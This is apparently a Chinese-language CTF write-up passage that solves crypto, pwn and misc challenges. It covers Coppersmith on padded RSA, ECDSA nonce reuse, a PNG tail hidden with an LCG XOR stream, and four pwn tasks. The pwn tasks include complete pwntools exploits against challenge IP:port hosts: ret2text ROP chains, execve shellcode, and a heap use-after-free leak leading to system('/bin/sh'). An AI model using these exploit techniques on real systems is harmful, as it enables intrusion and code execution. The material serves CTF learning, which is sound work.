c1 = 50192984704229516422576705848426706185707023557654942997226592852562126143797118081125527050565529571702518296053642057549607538952767595537352818598436177372629946093076195084953301667499579328461288560942915342433209991739202980657987347584757491195480319156057361829134996133204059551472598891366688783755
n2 = 68196420818362667184273231820367250019665598198220107894027697404250798750179650739212752171893537136631632644245299647403521159317636479179387396036378651369427323164026037204640004005081098772718308292781228113356944341374614054386589378286349095152732830327900238600877850386212764491160551279660914970501
a2 = 235763128007574771186749199470667788696
b2 = 82833393375329622580640447653813478693484654663680708964473557677310067110872
c2 = 58727033167047203506164797837999819283982869287436076252773072774355826490167620639330797956244757203726547611149611642979362714607329797512143580714003751905301065313982278186988038708909021000691905664629331025167676669052317049958574849948837597306860613961557323523558290710860835719858942854534226001532
n3 = 104197894722251549417361866562671346718448272653499933412399440512957241054274214931999347021968663121866250705242698152904168891226692027345376090411001289684534871464563352348782346283820734447304134789063563965860082130364230372312070163983650187312362722689902212270815366758596540699197732479604574605717
a3 = 289837185860108823269362666161877095653
b3 = 88038264202304767250178171651729306984925900158278305985019519489525502096874
c3 = 12441437714234741776087648075441633972630237216692770981303759863634569477393643678959437151894987980323367988780311101132662707086178418962311399292280866817688865303206505050428252909551141504556842671029262184318022978671849627397763537173137629868777942717009356259616195047064075877128354789683093509959

对脚本进行分析

同一明文 m，用 e=3 在三个不同模数 n\_i 下被加密；

每次先做仿射变换 `a_i*m + b_i` 再立方 —— 即所谓线性 padding；

a\_i $\~128 bit$、b\_i $\~256 bit$ 都已公开（只是混淆，不是真正的随机化）。

构造同根多项式

每个密文给出一个以 m 为根的多项式：

$f_i(x) = (a_i x + b_i)^3 - c_i \equiv 0 \pmod{n_i}$

化为首一

在 Z/n\_i Z 上把 f\_i 除以 a\_i^3，得到首一三次多项式：

$\hat f_i(x) = x^3 + 3 b_i a_i^{-1} x^2 + 3 b_i^2 a_i^{-2} x + (b_i^3 - c_i) a_i^{-3} \pmod{n_i}$

CRT 合并

对系数逐位 CRT 到模 N = n1 n2 n3，得到首一多项式 F$x$，仍以 m 为根（mod N）。

Coppersmith small root

m 大小 ~256 bit，N 大小 ~3072 bit，X = 2^300 已是宽松界。用 Howgrave-Graham 格 dim = 4 足够：

行 0..2: N * x^i        (i = 0, 1, 2)
行 3   : F(x)
列 j 上整体乘 X^j

LLL 后取最短行，按列除回 X^j 得到整系数多项式 g$x$；它在整数上以 m 为根。

求整数根

g$x$ 度数 3，用 sympy 求实根（其中一个是大整数），即得 m，再 long\_to\_bytes 即可。

解题脚本


from Crypto.Util.number import long_to_bytes
from fractions import Fraction

try:
    from gmpy2 import mpq as Q, mpz as Z
except ImportError:  # pragma: no cover
    Q = Fraction
    Z = int

import sympy

# --------------------------- exact-rational LLL -----------------------------
def lll(B, delta=Q(3, 4)):
    n = len(B)
    B = [[Z(x) for x in row] for row in B]

    def qdot(u, v):
        s = Q(0)
        for a, b in zip(u, v):
            s += a * b
        return s

    Bs = [None] * n
    mu = [[Q(0)] * n for _ in range(n)]

    def gso():
        for i in range(n):
            Bs[i] = [Q(x) for x in B[i]]
            for j in range(i):
                mu[i][j] = qdot([Q(x) for x in B[i]], Bs[j]) / qdot(Bs[j], Bs[j])
                Bs[i] = [a - mu[i][j] * b for a, b in zip(Bs[i], Bs[j])]

    gso()
    k = 1
    while k < n:
        changed = False
        for j in range(k - 1, -1, -1):
            if abs(mu[k][j]) > Q(1, 2):
                m_kj = mu[k][j]
                q = int(m_kj + Q(1, 2)) if m_kj >= 0 else -int(-m_kj + Q(1, 2))
                if q != 0:
                    B[k] = [a - q * b for a, b in zip(B[k], B[j])]
                    changed = True
        if changed:
            gso()
        if qdot(Bs[k], Bs[k]) >= (delta - mu[k][k - 1] ** 2) * qdot(Bs[k - 1], Bs[k - 1]):
            k += 1
        else:
            B[k], B[k - 1] = B[k - 1], B[k]
            gso()
            k = max(k - 1, 1)
    return [[int(x) for x in row] for row in B]

# ------------------------------ challenge data ------------------------------
e = 3
n1 = 134590028715846226751903719587861090472772080921099504036178613989523328571021119450984313988905557385036821505121612368860436253713267192159612607745301358472400758433053304358101099945515440169672493726615122471822947908806960237079424527450364377187388434878044214423874958715687632702618242260038201552961
a1 = 173235201602700035769143714622479214858
b1 = 58616053309986169433995951615552358657183395855412447208282770965760612937595
c1 = 50192984704229516422576705848426706185707023557654942997226592852562126143797118081125527050565529571702518296053642057549607538952767595537352818598436177372629946093076195084953301667499579328461288560942915342433209991739202980657987347584757491195480319156057361829134996133204059551472598891366688783755

n2 = 68196420818362667184273231820367250019665598198220107894027697404250798750179650739212752171893537136631632644245299647403521159317636479179387396036378651369427323164026037204640004005081098772718308292781228113356944341374614054386589378286349095152732830327900238600877850386212764491160551279660914970501
a2 = 235763128007574771186749199470667788696
b2 = 82833393375329622580640447653813478693484654663680708964473557677310067110872
c2 = 58727033167047203506164797837999819283982869287436076252773072774355826490167620639330797956244757203726547611149611642979362714607329797512143580714003751905301065313982278186988038708909021000691905664629331025167676669052317049958574849948837597306860613961557323523558290710860835719858942854534226001532

n3 = 104197894722251549417361866562671346718448272653499933412399440512957241054274214931999347021968663121866250705242698152904168891226692027345376090411001289684534871464563352348782346283820734447304134789063563965860082130364230372312070163983650187312362722689902212270815366758596540699197732479604574605717
a3 = 289837185860108823269362666161877095653
b3 = 88038264202304767250178171651729306984925900158278305985019519489525502096874
c3 = 12441437714234741776087648075441633972630237216692770981303759863634569477393643678959437151894987980323367988780311101132662707086178418962311399292280866817688865303206505050428252909551141504556842671029262184318022978671849627397763537173137629868777942717009356259616195047064075877128354789683093509959

ns = [n1, n2, n3]
as_ = [a1, a2, a3]
bs = [b1, b2, b3]
cs = [c1, c2, c3]

# ---- 1. f_i(x) = (a_i x + b_i)^3 - c_i, normalised to monic mod n_i --------
monic = []
for n, a, b, c in zip(ns, as_, bs, cs):
    ia = pow(a, -1, n)
    f0 = ((b ** 3 - c) * pow(ia, 3, n)) % n
    f1 = (3 * b * b % n * pow(ia, 2, n)) % n
    f2 = (3 * b * ia) % n
    monic.append([f0, f1, f2, 1])

# ---- 2. CRT coefficients to N = n1 n2 n3 -----------------------------------
N = n1 * n2 * n3

def crt(vals, mods, M):
    r = 0
    for v, m_ in zip(vals, mods):
        Mi = M // m_
        r = (r + v * Mi * pow(Mi, -1, m_)) % M
    return r

F = [crt([p[k] for p in monic], ns, N) for k in range(4)]
assert F[3] == 1
print("F(x) computed (deg 3 monic mod N).")

# ---- 3. Howgrave-Graham lattice (d = 3, t = 1, dim = 4) --------------------
d, t = 3, 1
dim = d + t
X = 1 << 300  # safe upper bound on m (m is ~256 bits)

B = [[0] * dim for _ in range(dim)]
for i in range(d):
    B[i][i] = N * (X ** i)
for j in range(t):
    for k in range(d + 1):
        col = j + k
        B[d + j][col] = F[k] * (X ** col)

print(f"Running LLL on {dim}x{dim}...", flush=True)
red = lll(B, Q(3, 4))
print("LLL done.")

# Recover the integer polynomial g(x) from the shortest vector.
short = red[0]
g_coeffs = [short[j] // (X ** j) for j in range(dim)]
while g_coeffs and g_coeffs[-1] == 0:
    g_coeffs.pop()

def evalp(coefs, x):
    r = 0
    for c in reversed(coefs):
        r = r * x + c
    return r

# ---- 4. Find the integer root of g(x) --------------------------------------
xs = sympy.symbols("x")
poly = sympy.Poly(sum(c * xs ** i for i, c in enumerate(g_coeffs)), xs)
m = None
for r in poly.real_roots():
    try:
        ri = int(r)
    except (TypeError, ValueError):
        continue
    for cand in (ri - 1, ri, ri + 1):
        if cand > 0 and evalp(g_coeffs, cand) == 0:
            m = cand
            break
    if m is not None:
        break

assert m is not None, "no integer root recovered"
print("m =", m)
print("flag =", long_to_bytes(m))

flag{d3e053494a1280f3cff1c22c170069c0}

ECDSA nonce 重用

题目截图

解题思路

challenge\.json：

{
  "public_key_x": 82937147571408969267139200041203360936951744683871440166987788062427108593019,
  "public_key_y": 15586372809254615553254077057166913120384173467039862910897487982227597191402,
  "message1": "57656c636f6d6520746f2074686520435446206368616c6c656e676521",
  "message2": "506c65617365207265636f766572207468652073656372657420666c61672e",
  "signature1_r": 79013718241246135302610197377430012073343423894519665480327871129212060301075,
  "signature1_s": 103286208825942613961036297876825547961346350046619406322280179767228016529778,
  "signature2_r": 79013718241246135302610197377430012073343423894519665480327871129212060301075,
  "signature2_s": 79104101230423979234833091375845809917052647390793147016296814906477227009899,
  "curve": "SECP256k1"
}

`signature1_r == signature2_r`。在 ECDSA 中 `r = (k·G).x mod n`，两条不同消息的 `r` 完全相同，意味着签名时使用了 同一个 nonce `k`。

ECDSA 签名公式（曲线阶为 n，消息哈希为 z，私钥为 d）：

s = k⁻¹ · (z + r·d)  (mod n)

当两条消息复用同一个 k（因此 r 相同）时：

s1 = k⁻¹ · (z1 + r·d)
s2 = k⁻¹ · (z2 + r·d)

两式相减消去 d，解出 k：

s1 − s2 = k⁻¹ · (z1 − z2)
      k = (z1 − z2) · (s1 − s2)⁻¹   (mod n)

再代回任一式即可解出私钥 d：

d = (s1·k − z1) · r⁻¹   (mod n)

其中 z = SHA256$message$ mod n（secp256k1 标准做法，消息为题目给出的 hex 串解码后再哈希）。

恢复出的私钥（64 位 hex），Flag 末段取私钥 hex 的前 32 位

exp如下：

import json, hashlib

d = json.load(open('challenge.json'))

# secp256k1 群阶 n
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

r  = d['signature1_r']
s1 = d['signature1_s']
s2 = d['signature2_s']

def H(hexmsg):
    return int.from_bytes(hashlib.sha256(bytes.fromhex(hexmsg)).digest(), 'big') % n

z1 = H(d['message1'])
z2 = H(d['message2'])

# 恢复 nonce k 与私钥 priv
k    = (z1 - z2) * pow(s1 - s2, -1, n) % n
priv = (s1 * k - z1) * pow(r, -1, n) % n

# 私钥转为 64 位 hex，不足补 0
priv_hex = f"{priv:064x}"

# 取前 32 个 hex 字符作为 flag 末段
flag = f"flag{{ecdsa_nonce_reuse_{priv_hex[:32]}}}"

print(flag)

恢复出的私钥（64 位 hex）：

a46b8f59aac5f0d5f1e661827c1cf3a7f536c9ce5a5d2452942215f16480d48b

Flag 末段取私钥 hex 的前 32 位：

flag{ecdsa_nonce_reuse_a46b8f59aac5f0d5f1e661827c1cf3a7}

Pwn

PWN-Authenticate

题目截图

解题思路

对附件 vuln 进行检查：

checksec --file=./vuln

结果要点如下：

No PIE：程序基址固定，函数地址可直接使用
No canary found：栈上没有 canary，适合直接做栈溢出
程序未去符号：函数名可直接看到

同时在程序字符串中能直接看到几个关键信息：

存在危险函数 gets
存在 system
存在 /bin/sh
存在后门函数 backdoor

说明这题的预期思路非常明确：利用 gets 覆盖返回地址，跳转到程序自带后门。

反汇编后可以看到 login 和 backdoor 两个关键函数。

1.backdoor()

void backdoor() {
    system("/bin/sh");
}

后门函数的作用非常直接，就是弹 shell。

2.login()

核心逻辑大致如下：

void login() {
    char username[0x40];
    char password[0x80];

    puts("=== Welcome to SecureAuth System ===");
    printf("Username: ");
    read(0, username, 0x40);
    printf("Password: ");
    gets(password);

    if (!strcmp(username, "admin")) {
        puts("Access Denied: Admin login is disabled.");
    } else {
        puts("Invalid credentials.");
    }
}

这里的漏洞点在：

gets(password);

gets 不会检查输入长度，因此可以溢出覆盖保存的 rbp 和返回地址。

根据反汇编可知：

password 位于 rbp\-0x80
函数返回地址位于 \[rbp\+8\]

因此从 password 起始位置到返回地址的偏移为：

0x80 + 0x8 = 0x88 = 136

所以 payload 的前 136 字节用于填充，后面覆盖返回地址。

一开始如果直接把返回地址覆盖为 backdoor，程序虽然会跳进去，但在执行 system$\&\#34;/bin/sh\&\#34;$ 时会因为栈未按 16 字节对齐而崩溃。

这是因为在 x64 下调用某些 libc 函数时，对栈对齐有要求。

因此需要先插入一个单独的 ret gadget，把栈调整到正确对齐后，再跳转到 backdoor。

本题中可用地址为：

ret：0x40101a
backdoor：0x4011f6

最终 ROP 链为：

'A' * 136 + p64(0x40101a) + p64(0x4011f6)

脚本如下：

from pwn import *

context.log_level = "info"

HOST = "120.27.146.76"
PORT = 28517

p = remote(HOST, PORT)

p.recvuntil(b"Username: ")
p.send(b"admin\x00")

p.recvuntil(b"Password: ")
payload = b"A" * 136
payload += p64(0x40101a)   # ret，对齐栈
payload += p64(0x4011f6)   # backdoor

p.sendline(payload)
p.sendline(b"cat flag")

print(p.recvrepeat(2).decode(errors="ignore"))

p.interactive()

拿到flag

PWN-NoteService

题目截图

解题思路

对附件程序 vuln 做检查，可以得到：

Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

这说明：

开启了 NX，不能直接在栈上执行 shellcode；
没有 Canary，存在栈溢出时可以直接覆盖返回地址；
没有 PIE，程序基址固定，函数地址可直接使用；
题目提示“利用程序自带后门函数实现 ret2text”，因此优先寻找隐藏函数。

反汇编 vuln 函数：

这里定义了 0x40 字节的栈缓冲区，但 read$0, buf, 0x100$ 却读入 0x100 字节数据，明显可以覆盖保存的 rbp 和返回地址，形成经典栈溢出。

程序中存在隐藏函数 secret\_note：

这正是题目要求的 ret2text 目标函数。

思路非常直接：

用溢出覆盖返回地址；
让程序返回到 secret\_note；
调用 system$\&\#34;/bin/sh\&\#34;$ 拿到 shell；
通过 shell 读取 /flag。

栈布局如下：

buf[0x40] + saved rbp[0x8] + ret addr[0x8]

所以覆盖返回地址的偏移为：

0x40 + 0x8 = 0x48 = 72

如果直接将返回地址覆盖成 secret\_note，程序会在 system$\&\#34;/bin/sh\&\#34;$ 内部崩溃。

原因是 amd64 下调用某些 libc 函数时需要满足 16 字节栈对齐。这里直接 ret 到后门函数会导致栈对齐不满足，从而在 do\_system 中段错误。

因此需要先跳一个单独的 ret gadget 做对齐：

ret gadget:   0x40101a
secret_note:  0x401196

最终利用链为：

'A' * 72 + p64(0x40101a) + p64(0x401196)

EXP如下：

from pwn import *

host = "47.99.147.34"
port = 21395

ret = 0x40101a
secret_note = 0x401196

payload = b"A" * 72 + p64(ret) + p64(secret_note)

p = remote(host, port)
p.recvuntil(b"Leave your note:\n")
p.send(payload)

# 进入 /bin/sh 后读取 flag
p.sendline(b"cat /flag")
p.interactive()

拿到flag

PWN-MessageBoard

题目截图

解题思路

文件检查

$ file vuln
ELF 64-bit LSB executable, x86-64, dynamically linked, not stripped

$ checksec vuln
Arch:   amd64-64-little
RELRO:  Partial RELRO
Stack:  No canary found       ← 无栈 canary，可以直接溢出
NX:     NX unknown (GNU_STACK missing)
PIE:    No PIE (0x400000)
Stack:  Executable             ← 栈可执行，能直接跳到 shellcode
RWX:    Has RWX segments

四大保护里关键的两个：没有 canary、栈可执行。结合"程序主动泄露栈地址"，结论就明摆着——往栈上写shellcode，把返回地址覆盖到 shellcode 起始。

ida打开文件分析，main函数如下

main 只是把 stdin/stdout/stderr 关掉缓冲然后调 vuln()。

关键函数是vuln()

两个漏洞点合体：

printf("Buffer at: %p", buf) —— 直接泄露 buf 在栈上的地址，绕过 ASLR；
read(0, buf, 0x100) —— 缓冲区只有 0x80（128）字节，却允许写 0x100（256）字节，足够把 saved RBP 和返回地址都覆盖掉。

漏洞利用思路

栈布局（从低地址到高地址）：

[ buf 起始 (0x80=128 字节) ][ saved RBP (8) ][ return addr (8) ][ ... ]
          ↑
       buf 地址（被泄露）

利用步骤：

接收 Buffer at: 0x... 的输出，解析得到 buf 的栈地址。
构造 payload：

前 0x80 字节填 shellcode（不足用 'a' 填到 0x88，覆盖 saved RBP）；
接下来 8 字节写 p64(buf)，把返回地址改成 shellcode 起始地址；

vuln() 函数 leave; ret 时，从 buf（也就是 shellcode）开始执行，拿到 shell。

偏移计算：buf 在 rbp-0x80，所以 buf -> saved RBP 距离是 0x80，再加 8 字节 saved RBP 就是返回地址，所以 shellcode后总共填到 0x88 字节再追加返回地址。

解题脚本

from pwn import *

context(arch="amd64", os="linux", log_level="info")

p = remote("120.27.146.76", 20056)

shellcode = (
    b"\x48\x31\xf6"
    b"\x56"
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
    b"\x57"
    b"\x54"
    b"\x5f"
    b"\xb0\x3b"
    b"\x99"
    b"\x0f\x05"
)

p.recvuntil(b'0x')
buf = int(p.recv(12), 16)
log.info("buf: " + hex(buf))

payload = shellcode.ljust(0x88, b'a')
payload += p64(buf)

p.sendlineafter(b"Message: ", payload)

# 列根目录、找 flag 文件
p.sendline(b"ls / 2>&1; ls -la /flag* /home /tmp 2>&1; find / -maxdepth 3 -iname 'flag*' 2>/dev/null")
p.sendline(b"cat /flag 2>&1")
p.sendline(b"cat /flag.txt 2>&1")
p.sendline(b"exit")
print(p.recvall(timeout=6).decode(errors="replace"))

flag{985511156b8b35d5df4a1cad23ca4603}

PWN-UserManager

题目截图

解题思路

题目实现了一个简易用户系统，提供四个基础功能：

register
login
delete
edit

从功能上看只是普通的用户管理程序，但在堆对象释放和后续访问逻辑上存在明显缺陷。程序删除用户时虽然释放了对应堆块，却没有同步清空全局用户表中的指针，最终形成了一个可利用的 Use-After-Free。在此基础上，再结合堆块复用和登录逻辑中的函数指针调用，可以逐步完成地址泄露、基址计算以及控制流劫持。

最终目标是把悬垂的用户对象伪造成一个 fake object，使程序在 login 阶段执行：

system("/bin/sh")

并进一步读出 flag。

在此基础上，通过重新申请合适大小的堆块，可以使新用户的密码区复用原用户结构体所在的 chunk，从而借助 edit 间接改写悬垂用户对象内容。结合 login 中对函数指针的调用，最终可实现控制流劫持。

利用思路如下：

1.构造堆重叠

先注册两个用户，再依次删除。由于旧指针仍保留在 users 表中，随后注册新用户时，其密码块可复用原先用户结构体所在内存区域。这样，对新用户执行 edit，实际上即可改写旧用户对象。

2.构造 strcmp oracle

通过伪造悬垂对象中的指针字段，使 login 过程中 strcmp 比较目标可控。根据登录成功或失败的返回结果，可以逐字节枚举目标地址内容。

利用该 oracle：

先恢复 show 函数指针，计算程序基址（PIE）
再读取 puts@GOT，恢复 libc 基址

3.劫持控制流

得到 libc 基址后，进一步计算出 system 和 \&\#34;/bin/sh\&\#34; 的实际地址。随后将悬垂用户对象伪造成：

pass\_ptr \-\> \&\#34;/bin/sh\&\#34;
show\_ptr \-\> system

再次触发 login 时，程序会执行：

system("/bin/sh");

进而获取 shell 并读取 flag。

exp如下：

#!/usr/bin/env python3
from pwn import *
import time

context(os="linux", arch="amd64")
context.log_level = "info"

HOST = "47.99.147.34"
PORT = 19588
BIN_PATH = "./login"

# binary offsets (PIE)
SHOW_OFF      = 0x9D0
PUTS_GOT_OFF  = 0x201F98

# libc-2.23-0ubuntu11.3 offsets
PUTS_OFF      = 0x6F6A0
SYSTEM_OFF    = 0x453A0
BINSH_OFF     = 0x18CE57

# Heap LSBs after the UAF setup
SHOW_PTR_LSB  = 0x98
CHUNK_PTR_LSB = 0x80

PROMPT_T = 6

class DeadSession(Exception):
    """Connection died or desynced — restart from scratch."""

def open_io(local):
    if local:
        return process(BIN_PATH)
    return remote(HOST, PORT, timeout=12)

class Exploit:
    def __init__(self, io):
        self.io = io
        self.io.timeout = PROMPT_T
        self._first_op = True

    # ---- low-level guards ----------------------------------------------
    def _expect(self, marker, t=PROMPT_T):
        try:
            data = self.io.recvuntil(marker, timeout=t)
        except (EOFError, ConnectionResetError, ConnectionAbortedError,
                BrokenPipeError):
            raise DeadSession(f"EOF waiting for {marker!r}")
        if marker not in data:
            raise DeadSession(f"desync waiting for {marker!r}, tail={data[-80:]!r}")
        return data

    def _send(self, data):
        try:
            self.io.send(data)
        except (BrokenPipeError, ConnectionAbortedError, ConnectionResetError):
            raise DeadSession("write failed")

    def _sendline(self, data):
        self._send(data + b"\n")

    def _menu(self):
        self._expect(b"Your choice:")

    # ---- menu primitives -----------------------------------------------
    def register(self, idx, length, data):
        if not self._first_op:
            self._menu()
        self._first_op = False
        self._sendline(b"2")
        self._expect(b"Input the user id:")
        self._sendline(str(idx).encode())
        self._expect(b"Input the password length:")
        self._sendline(str(length).encode())
        self._expect(b"Input password:")
        self._send(data)
        self._expect(b"Register success!")

    def delete(self, idx):
        if not self._first_op:
            self._menu()
        self._first_op = False
        self._sendline(b"3")
        self._expect(b"Input the user id:")
        self._sendline(str(idx).encode())
        self._expect(b"Delete success!")

    def edit(self, idx, data):
        self._menu()
        self._sendline(b"4")
        self._expect(b"Input the user id:")
        self._sendline(str(idx).encode())
        self._expect(b"Input new pass:")
        self._send(data)

    def login(self, idx, data):
        self._menu()
        self._sendline(b"1")
        self._expect(b"Input the user id:")
        self._sendline(str(idx).encode())
        self._expect(b"Input the passwords length:")
        self._sendline(str(len(data)).encode())
        self._expect(b"Input the password:")
        self._send(data)
        try:
            return self.io.recvuntil(b"Your choice:", timeout=PROMPT_T)
        except (EOFError, ConnectionResetError, ConnectionAbortedError):
            raise DeadSession("EOF after login")

    # ---- UAF setup -----------------------------------------------------
    def setup(self):
        # password0 / user0 / password1 / user1 all into fastbin[0x20]
        self.register(0, 0x20, b"A" * 0x20)
        self.register(1, 0x20, b"B" * 0x20)
        self.delete(1)
        self.delete(0)
        # malloc(24) reuses user_0's freed chunk as user_2's password buffer;
        # malloc(0x18) reuses password_0's freed chunk as user_2's struct.
        # Now users[0] (dangling) overlaps user_2's password buffer, so
        # edit(2, ...) writes through users[0]->{password,show,length}.
        self.register(2, 24, bytes([CHUNK_PTR_LSB]))

    # ---- oracles -------------------------------------------------------
    def oracle_relative(self, lsb, payload):
        self.edit(2, bytes([lsb]))
        return b"Login success!" in self.login(0, payload)

    def oracle_absolute(self, addr, show_addr, payload):
        self.edit(2, p64(addr) + p64(show_addr) + p64(0x20))
        return b"Login success!" in self.login(0, payload)

    # ---- byte-by-byte leaks --------------------------------------------
    def _leak(self, oracle, lsb_or_base, abs_mode, show_addr=None):
        leaked = b""
        for i in range(5, -1, -1):
            tail = leaked + b"\x00"
            for guess in range(256):
                pwd = bytes([guess]) + tail
                if abs_mode:
                    hit = oracle(lsb_or_base + i, show_addr, pwd)
                else:
                    hit = oracle((lsb_or_base + i) & 0xFF, pwd)
                if hit:
                    leaked = bytes([guess]) + leaked
                    log.info(f"  byte {i}: 0x{guess:02x}  acc={leaked.hex()}")
                    break
            else:
                raise RuntimeError(f"failed leak at byte {i}")
        return u64(leaked.ljust(8, b"\x00"))

    def leak_pie_show(self):
        return self._leak(self.oracle_relative, SHOW_PTR_LSB, abs_mode=False)

    def leak_libc_puts(self, puts_got, show_addr):
        return self._leak(self.oracle_absolute, puts_got,
                          abs_mode=True, show_addr=show_addr)

    # ---- finisher ------------------------------------------------------
    def pop_shell(self, system_addr, binsh_addr):
        # The last login() consumed "Your choice:" — start fresh here.
        self._sendline(b"4")
        self._expect(b"Input the user id:")
        self._sendline(b"2")
        self._expect(b"Input new pass:")
        self._send(p64(binsh_addr) + p64(system_addr) + p64(8))
        time.sleep(0.05)

        self._menu()
        self._sendline(b"1")
        self._expect(b"Input the user id:")
        self._sendline(b"0")
        self._expect(b"Input the passwords length:")
        self._sendline(b"8")
        self._expect(b"Input the password:")
        self._send(b"/bin/sh\x00")

        time.sleep(0.4)
        self.io.sendline(
            b"id; cat /flag* 2>/dev/null; cat /home/*/flag* 2>/dev/null; ls /"
        )
        try:
            out = self.io.recvrepeat(3)
            log.success(f"shell output:\n{out.decode(errors='replace')}")
        except Exception:
            pass
        self.io.interactive()

def run_round(local):
    io = open_io(local)
    try:
        ex = Exploit(io)
        ex.setup()

        log.info("phase 1: leak PIE via show pointer")
        show_addr = ex.leak_pie_show()
        pie = show_addr - SHOW_OFF
        puts_got = pie + PUTS_GOT_OFF
        log.success(f"show={hex(show_addr)} pie={hex(pie)} puts_got={hex(puts_got)}")

        log.info("phase 2: leak libc via puts@got")
        puts_addr = ex.leak_libc_puts(puts_got, show_addr)
        libc = puts_addr - PUTS_OFF
        system_addr = libc + SYSTEM_OFF
        binsh_addr = libc + BINSH_OFF
        log.success(f"puts={hex(puts_addr)} libc={hex(libc)} system={hex(system_addr)}")

        log.info("phase 3: trigger system(\"/bin/sh\")")
        ex.pop_shell(system_addr, binsh_addr)
    finally:
        try:
            io.close()
        except Exception:
            pass

def main():
    local = bool(args.LOCAL)
    rounds = int(args.ROUNDS) if args.ROUNDS else 20

    for r in range(rounds):
        log.info(f"=== round {r + 1}/{rounds} ===")
        try:
            run_round(local)
            return
        except DeadSession as e:
            log.warn(f"dead session: {e}")
        except RuntimeError as e:
            log.warn(f"runtime: {e}")
        except Exception as e:
            log.warn(f"unexpected: {e!r}")
        time.sleep(0.5)
    log.error("exhausted retries")

if __name__ == "__main__":
    main()

拿到flag

Misc

像素中的秘密

题目截图

解题思路

NG 结构拆解

PNG 的标准布局是 signature$8$ \+ chunks\.\.\.，每个 chunk 形如 length$4$ \+ type$4$ \+ data \+ crc$4$。逐 chunk 解析后：

偏移	chunk	长度	CRC 校验	备注
8	IHDR	13	✅ 通过	64×64 RGB
33	IDAT	124	✅ 通过	像素数据
169	IEND	0	✅ 通过	PNG 结束标志

按规范，IEND 之后不应该再有任何字节。这里多出了 64 字节，肯定是出题人塞进去的载荷。

附加数据如下

00000000 69cb3444 e6741ecc fec75329
8b2b8b36 5de383f9 b6a8455f aa22d9fa
801804f6 7e1336a0 8483d711 bb2c210c
fb1ee500 5f32e934 03862da8 e71ab15c

先验证一下图像本体没有 LSB 之类的隐写：

from PIL import Image
img = Image.open("image_08.png")
print(set(img.getdata()))   # {(255, 255, 255)}

只有一个像素值 `(255, 255, 255)`，所以 LSB / 位平面 / 调色板这些都不可能藏数据。题目标题里的"像素"是 misdirection（误导），真正的秘密在 IEND 之外。

对 64 字节做特征分析：

熵 (Shannon entropy)  : 5.60 / 8.00
字节频率              : 大致均匀分布
可打印 ASCII 占比     : 21/64 ≈ 33%

熵 5.6 说明数据不是纯随机也不是普通文本，符合"加密数据"或"压缩数据"的特征。

观察整体结构，把 64 字节拆成 8 段 8 字节：

0: 00 00 00 00 69 cb 34 44   ← 前 4 字节为 0，后 4 字节像 32 位整数
1: e6 74 1e cc fe c7 53 29   ← 高熵
2: 8b 2b 8b 36 5d e3 83 f9
...

第 0 段的"4 字节零 + 4 字节随机"是非常典型的 "32 位整数用 8 字节大端存储" 模式。常见的几种可能：

解释	后续数据
8 字节种子（实际 32 位）	后 56 字节 = 流密码密文
8 字节 IV（实际 32 位）	后 48~56 字节 = 分组密钥密文
8 字节长度/版本字段	后 56 字节 = 实际载荷

56 字节不是 16 的倍数 → 不太可能是 AES-CBC/ECB（块密码会要求 16 字节对齐）。

反过来，56 字节适合流密码（任意长度都能加解密）。

流密码用什么生成密钥流？常见的可能：

LCG（线性同余生成器）——CTF 里最常见的"自实现弱 PRNG"
Mersenne Twister（Python random 默认）
xorshift 系列
自定义 LFSR

LCG 的优势：实现极短、参数广为人知（C rand、Java、glibc、Numerical Recipes）。

试一组最常见的 LCG 参数表：

名称	乘数 a	增量 c	模数 m
Numerical Recipes	1664525	1013904223	2³²
glibc rand	1103515245	12345	2³¹
MS Visual C	214013	2531011	2³¹
Borland C	22695477	1	2³²

每组都试一遍："种子 = 前 8 字节 mod 2³²，跑 56 轮取低 8 位作为密钥流，与后 56 字节 XOR"。

def try_lcg(seed, mul, add, mod, ct):
    x = seed % mod
    out = bytearray()
    for c in ct:
        x = (mul * x + add) % mod
        out.append(c ^ (x & 0xFF))
    return bytes(out)

试到 Numerical Recipes `(1664525, 1013904223, 2³²)` 时，输出变成：

b'5bctImREPUNVbqJmUNHWmXHFkVQF1qoDw5JIlf' + b'\x00' * 18

中间结果 5bctImREPUNVbqJmUNHWmXHFkVQF1qoDw5JIlf 字符集是 \[0\-9 a\-z A\-Z\]，没有 \+/=。

这正好是 base62 字母表

base62 解码：

def base62_decode(s):
    alpha = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    n = 0
    for ch in s:
        n = n * 62 + alpha.index(ch)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")

输出：

flag{xor_with_pseudo_random}

完整的exp


from __future__ import annotations
from pathlib import Path
from typing import Iterator
import struct
import sys

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
B62_ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
B62_INDEX = {c: i for i, c in enumerate(B62_ALPHABET)}

# Numerical Recipes 的 LCG 常数
LCG_MUL = 1664525
LCG_ADD = 1013904223
LCG_MOD = 1 << 32

def extract_after_iend(path: str | Path) -> bytes:
 
    data = Path(path).read_bytes()
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError(f"{path} is not a PNG file")

    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        chunk_type = data[pos + 4:pos + 8]

        end = pos + 8 + length + 4  # type(4)+data(N)+crc(4) 都已在 length 之外
        if end > len(data):
            raise ValueError(
                f"chunk at offset {pos} ({chunk_type!r}) overruns file"
            )

        pos = end
        if chunk_type == b"IEND":
            return data[pos:]

    raise ValueError("IEND chunk not found")

def lcg_keystream(seed: int) -> Iterator[int]:

    x = seed & 0xFFFFFFFF
    while True:
        x = (LCG_MUL * x + LCG_ADD) % LCG_MOD
        yield x & 0xFF

def xor_with_lcg(data: bytes, seed: int) -> bytes:
    ks = lcg_keystream(seed)
    return bytes(b ^ next(ks) for b in data)

def base62_decode(s: str) -> bytes:
   
    n = 0
    for ch in s:
        try:
            n = n * 62 + B62_INDEX[ch]
        except KeyError:
            raise ValueError(f"invalid base62 char: {ch!r}")
    if n == 0:
        return b"\x00"
    return n.to_bytes((n.bit_length() + 7) // 8, "big")

def solve(png_path: str | Path) -> str:
    tail = extract_after_iend(png_path)
    if len(tail) < 8:
